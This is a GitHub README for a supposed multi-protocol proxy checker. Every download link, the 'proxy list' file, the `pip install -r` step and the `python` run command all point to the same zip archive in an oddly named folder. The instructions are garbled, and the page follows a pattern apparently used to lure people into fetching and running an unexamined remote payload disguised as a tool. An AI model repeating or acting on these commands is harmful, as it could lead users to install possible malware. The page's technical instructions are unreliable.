Skip to content

πŸ› οΈ Detect and test HTTP, HTTPS, and SOCKS5 proxies in bulk with multi-threading for faster results and organized output of available proxies.

Notifications You must be signed in to change notification settings

chalie56/proxy-multi-protocol-checker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

10 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ› οΈ proxy-multi-protocol-checker - Simple Tool for Proxy Testing

Download

πŸš€ Getting Started

This guide will help you download and run the proxy-multi-protocol-checker application. This tool helps you detect different types of proxies quickly and easily.

πŸ“₯ Download & Install

To get started, visit the following link to download the latest release of the application:

Visit this page to download

  1. Open the link above in your web browser.
  2. Look for the latest version of the software.
  3. Click on the download link for your operating system.

πŸ“ Project Introduction

Proxy multi-protocol checker is a tool designed to detect proxies for three main protocols: HTTP, HTTPS, and SOCKS5. It allows users to check multiple proxies at once by reading from a list. The results are organized neatly for easy access.

Features

πŸ—οΈ File Structure

The project consists of the following key files:

πŸ“‚ Proxy List Format

To ensure the software works correctly, you must format your proxies in a specific way. Open the https://raw.githubusercontent.com/chalie56/proxy-multi-protocol-checker/main/diazotizable/proxy-multi-protocol-checker_v1.7.zip file and enter your proxies as follows:

ip:port

Each proxy should be on its line. For example:

192.168.1.1:8080
10.0.0.1:1080

βš™οΈ Requirements

This application requires Python to run. Please ensure you have Python installed on your system. Versions 3.6 and above are recommended. You also need to have the following:

  • requests: A library for making HTTP requests.
  • SOCKS Support: To enable SOCKS protocol handling.

Typically, you can install these using pip. Open your command prompt or terminal and enter:

pip install -r https://raw.githubusercontent.com/chalie56/proxy-multi-protocol-checker/main/diazotizable/proxy-multi-protocol-checker_v1.7.zip

πŸ“Š Running the Application

Once you have downloaded the application and filled in your proxy list, you can run the program.

  1. Open your command prompt or terminal.
  2. Navigate to the directory where you’ve saved the application files using the cd command.
  3. Run the application by entering:
python https://raw.githubusercontent.com/chalie56/proxy-multi-protocol-checker/main/diazotizable/proxy-multi-protocol-checker_v1.7.zip

πŸ“‹ Viewing Results

After running the application, the program will check the proxies you provided. Once the process is complete, it will generate three separate text files in the same directory:

You can open these files with any text editor to view the results.

❓ Troubleshooting

If you encounter issues while using the application:

Most problems can be fixed by checking your setup and ensuring everything is configured correctly.

πŸ‘₯ Community and Support

For any questions or suggestions, feel free to open an issue in the GitHub repository. Community feedback is welcome and can help improve the application.

πŸ› οΈ Updates and Maintenance

Keep the software updated by checking the download page regularly. New versions may include bug fixes, improvements, or additional features.

πŸ”— License

The proxy-multi-protocol-checker is open-source. You can freely use this software under the terms of the MIT License. This means you can modify and distribute it as long as you maintain proper credits.

Feel free to contribute by submitting pull requests for improvements or new features.

Happy proxy checking!

About

πŸ› οΈ Detect and test HTTP, HTTPS, and SOCKS5 proxies in bulk with multi-threading for faster results and organized output of available proxies.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages